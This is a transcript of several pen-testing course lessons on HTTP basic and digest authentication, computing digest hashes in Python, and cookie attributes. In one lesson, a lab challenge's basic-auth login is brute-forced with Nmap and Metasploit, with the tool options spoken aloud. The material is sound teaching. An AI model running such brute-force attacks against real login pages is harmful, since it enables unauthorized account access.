have a look at it. The good news is there are ample online tools available to do base 64 encoding and decoding in case you land up getting such a string. And for people who are developers, I know I have a Python class in here as well in Pentester Academy. So you could just go into Python and you could actually import a module which is called base 64. And then if you wanted to encode, you could just do a base 64 dot encode string. Give it the string, let's say Vivek colon Pentester Academy. Strip it because a /n is automatically added. So you have Vivek Pentester Academy, and there you go. This is the base 64 encoded string, right? DML 2Z blah blah blah, which is exactly what you see in here, right? DML 2Z blah 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 ends in TEQ equals equals, ends in TEQ equals equals, right? So this is how you can even use Python if you are also taking the Python videos which are already there in Pentester Academy, right? So once the server receives this, if this was the right credential, then the server would allow access. If not, it would again send back the 401 unauthorized and reprompt for the password, right? So now let's go ahead and enter the right password. Let me stop sniffing for a second. And let me also quickly search for the right password because it looks like I've forgotten what the right password was. So just give me one quick second. While generating all of these challenges, a lot of times, I end up forgetting what the username and password was. Of course, as a solution to the challenge, I'm also going ahead and breaking this in one of the solution videos, which you can have a look at. But let me just quickly pause the video for a second rather than having you guys wait. Okay, we are back. So let me restart the sniffing. Go back in here. This time let me put in admin AADDD, hit an OK, and it says challenge cracked. Go back in here, and now what we see that based on what we had centered in the authorization header, which is this field in here, admin AADDD, the server responds back with a 200 OK. You can clearly see that in here. And the 200 OK, of course, consists of the HTML page where basically it congratulates us, right, that we have gone ahead and cracked the challenge, right? Fantastic. So this is how basic authentication works. If you're more curious, you can look at base 64 and how it works, etc. Or you can use one of the online services which I pointed you to in case you ever need to decode a string. Though most of the tools we will encounter excuse me, during this course have capability to decode base 64 and encode it automatically. In the next video, we will look at how we can launch different attacks to break a basic authentication prompt. So that's all for this video, guys. Thank you. Hello all. Welcome to the web application pen testing course on Pentester Academy. Now in the last video, we talked about HTTP basic authentication and how it works. In this video, we will look at how to attack it using tools such as Nmap and Metasploit. So as you probably imagined, because basic authentication never really blocks on multiple retries, which is if you keep sending the wrong username and password, tens and hundreds of times, it still allows you to make a new try. It is ripe open for brute forcing and dictionary based attacks. Now, if you look at the HTTP basic authentication attack web application challenge, which we put out in the separate series, I have solved this example using the Burp proxy. So go have a look at that challenge to see a Burp based solution. Now in this video, I'm going to show you two alternate solutions, one using Nmap and the other using Metasploit. Why? Because the more tools you have in your kitty for different circumstances, the better it gets, right? So we've looked at Hydra, we've looked at Burp, and now we'll take up Nmap and Metasploit. Now, Nmap, of course, as you probably imagine, can only do this using a NSE script. The name of the script is HTTP brute. So let me actually go in here. This is the challenge page, and this is the, I call it the man page for the HTTP brute NSE script. And here are the arguments. One is the host name, then you have the method, then you have the path, and then we need to give it the pass DB as well as the user DB variables, which will point to our user and password files. So let me quickly go in here. And first let me go ahead and create my users list. So let me open the file users.txt. Rather, let me first create a directory which says demo, so that I have everything in one single place. Vim users.txt, and I'm going to say admin and nick. And this is really what I have pulled out from what the challenge tells me to do, which is the username can be either nick or admin, and the password complexity is 5 characters and can only use A, S, and D in lowercase. Right? Now we have to generate the password file as well. So let me do this using crunch. 5 minimum, 5 maximum, A, S, and D. And let me store it inside pass.txt. Let me do a pwd. This is root demo. And now let me go in here. So users and pass.txt. So I'm going to type in nmap. And after that, there are a bunch of options in here. Port 80, of course, because we really don't want Nmap to kind of go bersec and try all possible ports and stuff like that. The name of the script is HTTP brute. So -p80 -- script HTTP brute, and then you have the script args. Script args consist of a long list, so HTTP brute.hostname is the first one. And I could just type in tester academy lab appspot.com. This URL can change later, so keep that in mind, just so that you refer to whatever URL is available when you play the challenge at a later date. So this is the hostname Pentester Academy lab.appspot, and then you have http-brute.method and then the path. So method is post, and this is something we can easily figure out by going ahead and doing a view source. Scroll down, and here we find it. Right, here we are. Method is post, and then here is the remaining part, which was basically pointing to the path itself. And I can just copy the path. And after that, we need to fill in the user database as well as the password database. So user DB and pass DB. So you have user DB equals /root/demo/users.txt, and pass DB equals again /root/demo/pass.txt. This completes all our arguments. -n for no DNS, -v for verbose, and then after that is basically the host itself. So we have Pentester Academy lab.appspot.com, right? Hopefully I do not have any typos. This was a long type, so forgive me if this throws up any kind of typo errors. Script args http brute.hostname equals Pentester Academy lab.appspot.com. Method is post, path. Seems okay. Let me kind of just quickly cross check. Seems fine. So let me run this. Let's wait for a second. And there you go, right? Basically says admin AA is valid credentials. Fantastic. Just as what we have in the screenshot as well. Awesome. So this is how we can do it using Nmap. I think really with Nmap, the only thing you'd have to kind of run around their website and check for is the different options which are available to you and to include them properly. Right. So now let's go back to Metasploit. And as far as Metasploit is concerned, there is actually an auxiliary module called HTTP login, or rather HTTP_login. Oops. And my output would probably have a little bit of misalignment because, you know, I'm having to run all of this in a slightly larger text just so that all you guys can see it properly. There you go. And here is where it is. Auxiliary scanner HTTP login. So we have use auxiliary scanner HTTP _login. Show options. Looks like tons of options in there. Let me kind of decrease the font a little bit this time. just because, or else, this is not going to be very legible for you guys. Okay, hope this is still decently viewable. Yeah, this is at least slightly better, right? So you have a bunch of options in here. The first is auth URI. So set auth URI, and this would have to be really the path. Going back in here, you just copy the path out. Paste it. Then blank passwords, nope, we don't need that. So let me set that to false. And then after that, we basically want to set the pass file, right? One per line, fair enough. So we have set pass underscore file, and this would be again root demo pass.txt, right? If I remember, that was the password file which we generated. Let me just quickly double check that. Yes, that was the one. After that, request type, right? The request type has to be post. Set request type post. Then you have our hosts. This is required. Set our hosts, and this would be Pentester Academy lab.appspot.com. Our host is Pentester Academy lab.appspot.com. Our port 80 is okay. Stop on success, yes. Set stop on success to true. Threads is currently 1. Let me actually set the number of threads to 20. Username, if you want to use for just one username or for others, just so that we can do a quick demo, let me just set it to admin, because with the Nmap script we know that admin is the username. And then you have to set the vhost or the virtual host. Let's actually again set it to Pentester Academy lab.appspot.com. Right, and now let's hit run. Hopefully I have everything we need. So it looks like this is trying a lot of other usernames and password, which it should not. So what I'm going to do is I'm actually just going to go ahead and blank out the user's file. Right, so I'm going to say set user underscore file and set user as pass to false as well. And then let me also set the user pass file to again null, right? And now let me run this so that it just picks up what we need. And now it's trying admin with all combinations of A, S, and D. So let me allow it to run it for a second while we pause the video. We are back, and even Metasploit is now telling us successful login for admin and AADDD, right? So that's how this is done. So I think we've used both Nmap and Metasploit in this video, and try it out yourself. Thank you. Hello all. Welcome to the web application pen testing class on Pentester Academy. Now in this video, we will look at HTTP digest authentication more from an RFC 2069 perspective. Now if you're wondering why I mentioned the RFC, it will be clear in just a minute. So what is digest authentication, or why was it created in the very first place? Now basic authentication, which we've looked at in the last couple of videos, unfortunately sends the user and password in plain text. Yes, we do base 64 encode it, but honestly encoding does not equal encryption, right? And this is the reason why typically it is very, very insecure, especially in today's world where you may access most of your websites and things like that over public networks using wireless, maybe even at your home using wireless. And unfortunately, if there is no encryption or the encryption is easily breakable, then someone can eavesdrop on the connection, gather the Wireshark traces, and then go ahead and decode the username and pass. Now, digest authentication tries to address this problem by sending a hash of the password rather than the password itself. Now, digest auth is actually mentioned in two RFCs. The first RFC is 2069, which is what we will discuss in this video. And later on, they added more enhancements to make digest authentication more secure in RFC 2617, right? Which we will also discuss later. Okay, so RFC 2069. Now, this may look complicated, but it's actually really very simple. Now, here is what happens when the client sends a request to the server to access a resource which is actually protected by digest authentication. Then the server sends back a 401 unauthorized, and in the www-authenticate header it mentions digest, mentions the realm, whatever the realm the server admin may have set, and then it sends two long random values. One is called the nonce and the other is called opaque, right? Now, when your client receives this, which means your browser in the most typical case, it will prompt you for a username and password. Now, after you've entered the username and password, assuming it's the correct combination, the browser sends back a response in which there is an authorization header which mentions it is for digest rather than basic as we had seen previously. The username is mentioned as is in plain text. The realm is the same, matches what it had received from the server. The nonce also has to be the same. And if you kind of quickly go down, the opaque is the same as well. And after that, you have the URI. This is really the resource we are trying to access, which is protected by digest authentication. And then finally, you actually see a response, which is a value which again looks pretty long and random. Now, in reality, using a bunch of quantities, which includes your password and other things, your browser derives this response and sends it back. The server verifies it and then decides whether to allow you access to the resource or not. Now, what I want to really kind of go ahead and convey in this video is how this response is created. So let's look at that. Now, the response calculation, as complicated as it looks like the moment you look at this page, it's actually very simple. The hash is actually created using MD5, which is a well-known hashing algorithm. And here is how the hashes are created. There are two hashes which are created initially. Hash 1 actually creates an MD5 hash over the username :realm :password. So here is an example. Let's say you entered a username admin. The realm is Pentester Academy and the password is ASDSS. Then we go ahead and create a hash of admin :Pentester Academy :ASDSS, and that is stored in a quantity called hash 1. Now after that, we create yet another hash, let's call it hash 2, and that is over the method :URI. Now method is whether it's a get or a post with which we are trying to access the resource, and URI is really the actual path of the resource we are trying to access on the server. So let's say as an example /lab/webapp/digest2/1, right? So these two hashes are first created, and then the response is actually created by doing an MD5 of #1 colon the nouns colon #2. Now it's clear to you that #1 was actually generated through a combination of username, realm, and password. #2 was generated using a combination of method and URI. And nonce, this is really that long random value which the client had received from the server when it tried to access the restricted resource. Opaque does not play any role in RFC 2069 to create the response. Right? Now this response value is what is sent by the client, and the server goes ahead and follows the exact same process with the username and password which it has on its side. And if the response matches, then access to the resource is allowed. If it does not match, then the server once again sends back a 401 unauthorized. Now there are a lot of other things which come into play, which is how often does the nouns change, the role of opaque and all of that, which I'm kind of leaving out simply because you'd have to pretty much go through the whole RFC for all the nitty-gritty details. I think understanding how the hash is created from the username, password, and realm, and after that how the response is calculated, is sufficient depth from a pen testing perspective, as we will see when you take on the different challenges I have created for this section. Now let me actually show you a live demo of how this would look like. So I'm using challenge 5, and you can go to the web application challenges section on Pentester Academy to have a look at that. And let me, so challenge 5, let's open up Wireshark, start sniffing, apply a filter for HTTP. So we are looking at HTTP. Now let me go ahead and run challenge 5, click on enter Pentester Academy, prompts me for a username and password. Let me put in admin password, doesn't work. But if I go back in here and I actually start looking at this, if you notice, this was really the first request which went in, a GET request, and this had the server respond back with a www authenticate. And if you notice, it says digest realm pentester academy, nonce long value, and opaque is basically blank, which is perfectly okay. There is no real problem with it. Now to this, the client responds back with authorization, digest, username admin, realm once again pentester academy, which is what matched the server's response. And if you notice the nonce, which is same as what we found before, if you notice in the last unauthorized message, the nonce value was 78991. 78991, that's pretty much what the client has used. Then you have the URI, and then you have the final response, right? And because the final response does not match, probably because the username and password does not match, the server sends back another unauthorized message with again the same www authenticate header, realm pentester academy, the nouns and opaque, and stale equals true, which is a parameter you don't need to kind of worry about right now. And let's say we put in the right username and password. Let's see what happens. Let me restart this once again, and let me actually go ahead and figure out what the username and password I had kind of set. Okay, so we go back in here, admin, and then this is ASDDS. Now it says challenge cracked. If we go back in here, if you notice, here was the original request from the client, and this basically has your entire authorization header, which is admin realm pentester academy nonce URI response blah blah blah. And because this response is a valid response, the server replies back with a 200 OK, and that is nothing but this page which gets displayed, right? Awesome. So I would really recommend that you try this out yourself with Wireshark. It's important you understand how the headers interplay with each other. And keep in mind that what we have taken up right now is a pure RFC 2069 implementation. Now in the next video, I will show you how to compute all of these hashes so that you have some idea about what is happening in the background, and you can even take on tougher challenges where tools might fail. So that's all for this video, guys. Thank you. Well, that's all. Thank you. Hello all. Welcome to the web application pen testing course on Pentester Academy. Now in this video, let's go ahead and build on the knowledge we acquired in the last one and look at how to play with digest authentication by creating our own hashes. Now in the last video, we had looked at creating a response using two hashes, hash 1 which is MD5 of username, realm and password, hash 2 which is an MD5 of the method and URI, and the response which is an MD5 of hash 1 nonce and hash 2. Now as I already mentioned, this is according to RFC 2069, and now let's try and go ahead and create the hashes ourselves. Now you can use a multitude of languages and systems to do this. I prefer Python, and we also have a full-blown Python course available on Pentester Academy, which you can have a look at if you're interested. Even if you do not want to learn the language, I really think it's possibly worth your time in at least looking at what it can do for you, which is what we'll see in this video. Now, of course, we wouldn't go out and try and write our own MD5 algorithm implementation. And this is where we are going to use Python's implementation available in a module called hashlib. So let's first go ahead and create the hash. And let's go in here. Just to remind you, this is the challenge we are working on, challenge 5. And what I'm going to do is first launch Wireshark and capture the request end to end. So let me start sniffing. Let me add a filter for HTTP. Let me go back in here, Pentester Academy, enter Pentester Academy. And right now I'm going to put in the right username and password, which is admin and ASDDS. And of course it says challenge cracked, and we should have a bunch of packets in here. Let me stop the collection. And let me go up here. So this is the first request sent by us to the server, which was a get for a resource. The server responded back with a 401 unauthorized. And if you notice, just like we saw before, in the www-authenticate header, we have the nonce. And after that, we respond back with a reply. Here is our response, and the server basically responds with a 200 OK. So let me work through this example and try and take the value of the nonce and all of that and compute the response and prove that that response is really identical to what we have sent to the server and which it accepted as a valid response, right? So we are going to do what the web browser did step by step. So let me go back in here. Let me type in Python, import hashlib, and now let's create hash1. Now to remind yourself, hash1 was really nothing but the username, the realm, and the password, right? The difference is we are going to use the password ASDDS, while in the slide it is ASDSS. And then we convert this into an MD5 hash, and then convert that hash into a hex digest so that we can comfortably use it. So let's go ahead and do this. So we have hashlib.md5 admin : pentester academy : the password, the right password as we used was ASDDS, and then hex digest. Now it's super important that you cannot have even a capitalization error in here, right? Your MD5 would differ totally from what would be output if you make any form of errors. So let's look at hash1, and hash1 is 2C9 blah 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 and ends in 9195. Now when you guys are trying this on your setup, you should get an exact answer which matches what is here. If you don't, go back and revisit this string on which you're creating the hash. The string would definitely be different. Okay, fantastic. Now let's go in here and let's now create hash2, right? So hash2 is basically the method followed by the URI. So let's go back in here. Hash2 is equals hashlib.md5, the method which is get. Now the URI is something we can go ahead and pick up from in here. So if you notice, the URI which we are trying to hit for is /lab/webapp/digest/1, right? That is what we have to use here as well. /lab/webapp/digest/1. Any mistake here would again go ahead and jeopardize what we are trying to do. So let me verify lab webapp digest1. Lab webapp digest1. Because I'll tell you guys, the worst kind of mistake when you're working through this is like mistakes in the strings you use and all of that, because you would write the program, you would get everything absolutely right, and because of a mistake in copying a string, you pretty much end up thinking what you're doing is wrong. Okay, so get lab webapp digest1 hex digest. So here is hash2. This also has to be identical because the parameter I am using, which is get and lab webapp digest1, is identical to what you need to use, right? Fantastic. Now let me go in to the third part, which is calculating the response hash, for which we need to extract the nonce from the request. Now this step would differ for both of us because we're going to pick up the nonce from what the server sent us, and because the server is supposed to generate new nonces for other clients, you would end up seeing a different nonce for yourself. So let me pick up this nonce. Let me right click and say follow TCP stream. And let me go ahead and copy the nonce from here. Let me go back in here. Let me paste this. Okay. Now let's go back to computing the final response hash. The final response hash is an MD5 of #1, the nonce, and #2. Okay, let's go back in here and we say response string equals #1 plus colon plus nonce plus again colon plus #2. Right? Let's see how our response string is looking like. It should be long. There you go. So this is #1 nonce and then #2 separated by colons. Now we need to create an MD5 over this. So let's say response equals #lib.md5. And even if you do not know Python, honestly, the syntax is super easy. But you know what we are doing right now. So I think it should be easy to follow along. And once you are exposed to the beauty of the Python language, probably it may motivate you to learn it. Right? So response is #lib.md5 for the response string and then a hex digest. So let me now view the response, which is 30, 50, blah, blah, blah. Let me go back in here. And if you notice, the response which we have is 30, 50, 46, blah, blah, blah. The one in here. And ends in 66B8. Ends in 66B8 as well. Fantastic. So what have we really done? We have computed the response the way the browser would, but manually, so that now each and every concept about how the HTTP digest authentication is created is really crystal clear to you, at least for RFC 2069, right? It's crystal clear. Okay. Now only keep in mind that among all these three hashes, #1 and #2 would be identical for both of us, while the response hash would be different because we would be picking up different nonces from the Wireshark trace file. So hopefully now this is clear entirely. Try this out, and thank you very much for listening. Bye-bye. All, welcome to the Web Application Pen Testing course on Pentester Academy. Now in the previous videos, we've looked at the very simple, the initial version of the digest authentication. Now let's look at HTTP digest authentication as in RFC 2617, which is really much more security enhanced. So what is the key difference? Well, 2617 adds client-based nonces as well, which help in mitigating chosen plain text attacks. Now, from a pure implementation perspective, we also have an additional field called QOP, or quality of protection. Now, QOP is auth for just authentication and auth-int for authentication and integrity. But truth be told, almost most installations still only support QOP in auth mode. So how does this look like from a sample server client exchange? So this is taken directly from RFC 2617, and when the client first initiates the request to access a resource which requires authorization, then the server again sends back the www authenticate header. The mode is digest, realm, you already know what that is. QOP, basically the option supported, so auth-int, which is what we just spoke about. And then you have the nonce and the opaque, right? Just like in the previous case. Now after this, the client looks at QOP, and as I said, in most cases says, hey, I only support auth. So it picks up, and this is the response from the client. It picks up the nonce, the opaque, and all of that, and basically goes ahead and creates a digest response. The realm remains the same, the nonce remains the same, the opaque remains the same, and QOP is what it supports, which is auth, as we can see. URI is actually the resource path, which basically we were trying to access. NC is very simply put just a counter, and C nonce is the client nonce, and then it computes a response. Now, as complicated as this looks, in reality it is really very simple. Now, based on what we saw previously, hash1 and hash2 are computed exactly in the same way. So hash1 is an MD5 of the username :realm : password, while hash2 is an MD5 of the method :URI. The only change is in how the response is calculated, which is an MD5 of hash1 : the nonce, which was the server nonce which was sent, the nonce count, which is basically the NC field, if you remember, which was really 000001, followed by the client nonce, which basically is the C nonce, followed by the QOP, which is auth in this case, and then finally hash2. So we concatenate all of this, take an MD5, and that is what is the response in this case. Now, I have given you a sample Wireshark file which you can open. The link is down below in the video. This is how the file should look like. You can go ahead and add a filter for HTTP, and basically you can open the 304 not moved response, right click and say follow TCP stream, and you would basically find that the client sends the authorization header with digest username Vivek, realm pentester -academy, and a bunch of other stuff which we've discussed right now. So what you need to do as an exercise here is you need to go ahead and calculate the response based on all of these parameters using these equations. Now, I've already taught you how to do it, so I'm just going to quickly run you through how to do it in the slides, and you can try it on your own. Now, the important thing is, I've been using Python quite a lot to solve many of these. However, please note that I'm using Python 2.7. Kali has 2.7.3 to be precise. And as one of my students went ahead and mentioned, right, Thomas mentioned that if you go ahead and use Python 3, this specific syntax does not work. And the reason is Python 3 really is a bit different in a lot of ways from a syntactual perspective. So you will have to figure out the appropriate libraries and how to call them in order to make this work with Python 3. We will be using Python 2.7.3, which is what ships with default with Kali Linux, right? Keep that in mind. Okay, so the first part of the calculation, hash1, MD5 of username, realm, and password. So I import hashlib, I compute MD5, the username is Vivek if you look at the pcap file, realm is pentester -academy, and after that the password which I'm using is pentester academy single word. I take a hex digest and this becomes hash1. Hash2 is an MD5 of the method and URI. Again, in this case, hash2 is very simple to calculate, get : here is hash2. Finally, the response is a concatenation of hash1, server nonce, nonce count, client nonce, QOP, and hash2. Now, we've already computed hash1 and hash2. And here is what I've done. From the Wireshark trace file, I've copied the nonce, I've copied the nonce count, the client nonce, QOP, and then I've created the response string by concatenating all of these quantities separated by colon, right? After that, I just go ahead and compute an MD5 over the concatenated string and we get the response. if you compare it with the response in the Wireshark trace file, you would see that it identically matches, right? 94447, 94447, blah, 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 2390, 2390, right? So really, this is how you would go ahead and compute the response in this case. So the key thing really which I wanted to mention here was the fact that there are many ways with which you can do things. One of them, of course, as I've shown you, is with Python. And so I think after this, pretty much HTTP digest authentication, the one basic one which we took up in the last couple of videos, the one with QOP equal to auth should be totally clear. I leave it as an exercise to you to look at QOP equal to auth-int. There's just one small modification in the response creation, but again, it's probably simple enough. And as I mentioned, auth-int, which is authentication and integrity, both checks are currently hardly used by many clients. So that's all I had in mind for this video. Now I have a small request to make of all of you. If you like what you see in Pentester Academy, please do recommend to your friends and colleagues at work and otherwise. I've been putting in my heart and soul into this website right now, and I think this can be a success only if we have a large number of members. So I'd really request, if you like Pentester Academy, the videos which we put out, and you're enjoying your experience, please do recommend. I would really appreciate that. Thanks a lot, guys, and see you in the next video. Bye-bye. Hello all. Welcome to the Web Application Pentesting course on Pentester Academy. In this video, we will look at HTTP statelessness and cookies. Now, many of you may have heard that HTTP is a stateless protocol. So what is really meant by this? Well, what this really means is that every single request you make over HTTP is actually treated independently. Now, what do I mean by that? The server does not retain any state for the clients. Now, let me give you a simple analogy. Let's say that every morning we bump into each other in the park, right? And you basically say, "Hey Vivek, I'm John, good to meet you." Right? So the first time that happens, the next morning you meet me, you bump into me, you would expect that I would go ahead and recognize you, and you would not have to say, "Hey Vivek, I'm John," right? Unfortunately, in the case of HTTP, a HTTP web server basically will not remember you the next time you come to it, which means you would all over have to introduce yourself again, right? I don't know the movie, I don't remember the movie name, but I think it was Memento or something like that, where the person pretty much, forgets what happened in the last 24 or 48 hours maybe. So that's typically the web server for you, and the web server pretty much doesn't remember you across requests. Now, this seems to be a super difficult problem, right? If you think about it, because what this would mean is that every single request needs to be self-sufficient enough from an authentication perspective and authorization perspective, right? Which means it must carry enough information that either the server or the web application can authenticate it. Now, how is this accomplished? Or rather, how is statefulness put in? There are many other ways, but one of the ways which we can add statefulness is the use of cookies. However, cookies themselves have multiple uses, including both session management as well as storing user preferences. Now, what is a cookie? Very simply put, a cookie is a mechanism which actually allows the web server to store and retrieve small amounts of data from the client, which in the typical case is your web browser, right? Now, where is this information stored? It's stored in a file on the client side, on the browser side, in one of the browser's temporary directories. Now, the most important thing here is really cookie is nothing but just plain text. There is no executable code in it, right? The analogy I can give you is this is like basically an ID card, which you need to carry every single time when you want to enter a premises, right? If you have that ID card, the guard allows you in. If you don't, he doesn't, right? So cookie can go ahead and play the role of the ID card to identify itself to the web server and web application in a unique way, depending on the actual implementation and architecture of it. Now, the most important thing is the size of individual cookie files cannot exceed 4K, right? This is a hard limit. Now, the question arises now, how does the cookie really look like? What is stored in it and all of that? So let's jump right into the demo. I have my Kali machine in here, and I have the browser running. Let's go to tools. Let's go to edit, preferences, and we actually go down to privacy. And in privacy, you actually see that they basically write here, you may want to clear your recent history or remove individual cookies, right? So let's say we go ahead and first clear every single thing, right? So clear history includes clear cookies and a bunch of other stuff. Let's clear everything. Close this. And now let me actually visit the site yahoo.com. Okay, let me go ahead, click on preferences, and let me click remove individual cookies, right? And let me type in yahoo.com. And if you notice, we can see a bunch of cookies which seem to match our criteria. Now, if you select any one of these cookies, you would actually find that the cookie uniquely has the name, the content or the value, the domain for which it is valid, the path, and a couple of other things, including the expiration date, etc. Right? So this is really how individual name value pairs in the cookie look like. I'll come to what each of these fields mean and how they're important to us a little later. But this is how you can look at any given cookie which is there in your web browser's cache. Now, the second question arises, how is a cookie really sent by the server? And what does the client really do with it apart from storing it locally? So to answer this, let's again kind of go back in here. Let me remove all cookies, which I've done. Close, close. I've also opened up Wireshark. Let me start sniffing on each 0. And let me this time, let's say, go to cnn.com. Site is opening. And we see a ton of traffic in here. Let me type in HTTP. Now this shows us a lot of HTTP traffic. Now when the browser wants to set a cookie on the client, then the HTTP header used is called set-cookie. Okay, so if you want to go ahead and filter by all requests which have the set cookie field, this is where it is, set-cookie, then we add a filter called http.set_cookie. So I go back in here, .set_cookie, and there you go. Now each of these requests basically has a set-cookie field in it, right? We can kind of move around and you'd actually see that there can also be multiple set-cookies which are there, right? This is absolutely allowed. You can have multiple name value pairs which you want to set. Now, once the client receives this, depending on whether it's a session cookie or whether it is supposed to be stored for a longer time, the client would go ahead and decide to put it in a temporary cache situation, or probably in a little bit more longer situation depending on the expiry date. We'll discuss that in just a bit. However, the most important thing is now every single time the client makes a request back to the server, it would actually include the cookie. And this is done using, again, the cookie header tag, and the cookie is mentioned, right? So really, what am I getting to? Cookies are a very simple way by which the web server can store some form of stateful information on the client. It does so by sending a new header called set-cookie, in which the name, value, and other attributes of the cookie are mentioned. And then every single time the client makes a request, the cookie is included. We'll see later there are other important aspects such as the path, the domain, and all of that, which dictate when a specific cookie is actually sent back to the server, back the client. But very simply put, the cookie is sent back every single time the client wants to communicate with the server, right? Now let's try and understand the individual attributes of the cookie. Now, just as we saw, the server sent a set-cookie header field and the client sent a cookie field, right? How are these two correlated? Now the server tells the client, set the cookie, here is the name equals value pair, and you can have multiple of them separated by colons, and after that you have other attributes. Now when the client wants to send back the cookie, it only sends back the name value pairs. It does not send back the other attributes, right? The other attributes are really for the client to decide whether or not to send the cookie or not, to expire it, whether it's supposed to send it over HTTPS and all of that, right? So examples of name value pairs. Now typically you can have something like session ID equals a very long random value. You can even have multiple name value pairs such as name equals Vivek colon age equals 12, country equals India, so on and so forth. So really, I mean, pretty much you could put in any name value pair which is allowed. And as far as selecting the name is concerned, again, I've mentioned session ID, but there's no hard and fast, kind of set through which you have to pick up the names, right? You can pretty much use any name. Now coming to the attributes, one of the most important attributes of a cookie is the expires attribute. Now expires is really when the browser should go ahead and delete and expunge the cookie from its cache, right? Now there is a very important point here. If a set cookie does not have expires, what that means is it is a session cookie. Now this instructs the browser to remove the cookie as soon as the user closes the browser. Only if the expires field is mentioned is the cookie retained across browser restarts, right? Very, very important. Now, assuming the expires field is there, the format is super simple. Format is day, comma, the actual day in the month, date in the month, followed by the month, the year, and then hours, minutes, and seconds, all in GMT. Let me show you how this looks like. Let's actually go to the cookie and set underscore cookie. And I've selected one of these. If you notice, set cookie basically has UG1 equals some long random value. Then it says path, we come to what that is later, domain, finally expires. Expires equals Sunday, 23rd September, right? Hyphen 18, so that is really very far away, 095840, right? Awesome. And you can pick up other requests as well, and you would notice that some cookies may not have the expiry date. These are session cookies. It's very important to keep that in mind, right? Fantastic. Let's go back. Now, some of the more recent implementations of cookies in RFC 6265 also include a max-age parameter. So rather than giving a date and time on which this expires, max-age basically gives the interval in seconds after which the cookie should be expired. So as soon as the browser receives the cookie, basically the timer starts based on the number of seconds written in the max-age parameter. Domain. This is really the domain or subdomain for which the cookie is valid and should be used, such as docs.securitytube.net, .images.securitytube.net, and when you say .images, which pretty much means any subdomain based out of images.securitytube.net, the cookie would be valid for that. Similarly, you have path, where path can dictate when certain cookies should be sent and when certain shouldn't. So for example, you can set the path to be the root or /blog or pretty much any other valid path within your application. And I think we can see examples of this here as well when we went ahead and picked this up. So in this set cookie, you actually have path equals basically the root folder. Secure. Now this is important. What this means is this cookie should only be sent over an HTTPS connection, which means if for whatever reason the client talks to the server over HTTP, then this cookie will not be sent over that connection, right? This is just to ensure transport layer protection. Finally, HTTP only, right? This is important. Later on, we will talk about an attack called XSS or cross-site scripting. HTTP only cookies do not allow client-side scripts such as JavaScripts to be able to go ahead and pick up the cookie from the browser and do things with it, right? So that's all I have for the introduction to cookies. In the next video, we will do an interesting lab with cookies. So before I finish, I would really like to request that if you like all of these videos on Pentester Academy, please do recommend to your friends and colleagues, at work or people who you may know in the InfoSec community. We are really trying to make InfoSec education affordable for everyone, and I really need your help in this. And you can connect to us on either Twitter or Facebook. On Twitter, we are SecurityTube. You can also search for again SecurityTube on Facebook. And you can always give us feedback, write us interesting comments, or even solutions to any of the lab exercises you're doing, and we'll retweet and respond to you. That's all for this video. Thank you. Hello all. Welcome to the Web Application Pentesting course on Pentester Academy. In this video, we will look at a set cookie demo using http cookie.py. Now, what are we really going to do in this video? So when I explained cookies and how cookies are set by the web server and how your application sends them back, based on the path, domain, expiry, and all of those parameters, I was thinking to myself, how should I go ahead and give you an experience of probably setting your own cookies on the server side? Because to tamper cookies on the client side is super simple. And for people who haven't done it before, I'll show you a bunch of techniques with which you can. However, as a pen tester, I think you would be at a great advantage if you also understood how web developers go ahead and work with cookies. So here is what I've done. I've created a very simple application called http cookie.py, and you can download the application from down below. So let me show you a demo so that we can illustrate how cookies work better. Now there's something important even before we begin, which is http cookie.py, right, has some dependencies of Python libraries which do not exist on Kali Linux to begin with. So let's just go ahead and quickly install them. So the first thing I'd like is to install pip so that we can install Python modules very simply. So we'll do an apt get install python-pip. Now think of pip and a variation you may have heard of, easy install, as a program with which you can go ahead and then install Python modules on your system very easily, right? It's like an apt get but for Python mods. So after pip has been installed, then we can go ahead and install the module dependencies which we have. So while you install pip, you also have setup tools for Python which also get installed. It's going to take just a second. Okay, now let me type in pip install webob. So really we want three things: webob, paste, and webapp2, right? And if you aren't a developer, do not worry about this at all, right? This exercise has nothing to do with development. Paste, pip install paste. And while this, okay, this should just take a minute, so we don't want to start something else. Really what I'm about to show you is a very simple program which illustrates how developers go ahead and install cookies. And finally, we're going to install webapp2. Let me clear the screen. This is the WSGI compliant web application framework. And if you've taken my Python class or are going through the Python videos on Pentester Academy, you may find this exercise even more interesting. So let's open up http cookie.py. So let me open this up in Pico. Oops. And here is the program. Now you guys can install and you guys can open this in Pico and follow through. I'm going to use Vim, and for people who know how to use Vim, I think Kali doesn't come with Vim, so you need to do an apt get install Vim. And for people who've never used Vim, probably you can continue to use Pico. I mean, Vim is a slightly more powerful editor, honestly a lot more, but I mean there is no mandatory requirement to use it. Okay, so what does this program really do? Well, it goes ahead and listens on port 8080, right, on all available interfaces, and then it serves a very simple web application, and all that web app does is displays all the HTTP headers it receives from the client and goes ahead and sets two cookies if you hit the root page, and the first cookie is called root_session_id, and we create a really long random number of size 128 bits. The max age is set to 1200 and the path is set to the root directory. Then we set another cookie called blog_session_id, again long and random. Max age is set to 1800 seconds and path is /blog, right? And after that we have some simple handlers which really, if you aren't a developer, you didn't need to worry about. So here is what happens. Let me now go into the demo. Remember to do a chmod a plus x HTTP cookie so that we can make it executable, and you can run it. Right? If you're running this on Kali, you should have no problem after the dependency resolution. If you plan to run this anywhere else, please ensure that you handle the dependencies appropriately. So let me open up Iceweasel. And let me go ahead and type in localhost 8080. Right? So if you notice, our little web application responds back, and it basically says HTTP headers received, and then it goes ahead and lists all the headers. Now, the first time this application visits our, the first time the browser visits our website at localhost 8080, of course, it does not have any cookies. And that's really the time when we set the cookie. Now, if you remember, we've set two cookies. One is the root session ID and the other is for the blog. So if we go ahead and hit this URL again, you would notice that the root session ID cookie is now sent by the browser back to us, right? Why is the blog one not sent? Simply because the blog cookie was set with a path /blog. So only when we are inside that path or anything below that, we would go ahead and be able to see that cookie. So as an example, when I go in here and say /blog, you would now find I have the blog session ID as well as the root session ID both sent to me, right? And the moment I change this to something else, right, like for example blogging, you would notice that I just received the root session ID which has path /, right? Or alternately, I can go to forum, and again I just received the root session ID. So right now this application just responds to /blog, /blogging, and /forum. If you try anything else, it's just going to give you a 404, right? So why is this interesting? It's simply interesting because A, this demystifies the role of path when you set a cookie. And the second thing is, if you're feeling a bit more adventurous, you could actually kind of go in and make small modifications in here. So as an example, you could go ahead and modify this to have like, some other name, let's say session ID, run the program again. And let's go back to root again. Now, of course, the first time you now visit it again, it would only send you back the root session ID. But the next time you now visit it, it's going to send you back the older root session ID as well as the newer cookie, which is the session _ ID, right? The reason you still got sent the root _ session _ ID is because you have not explicitly told the browser to 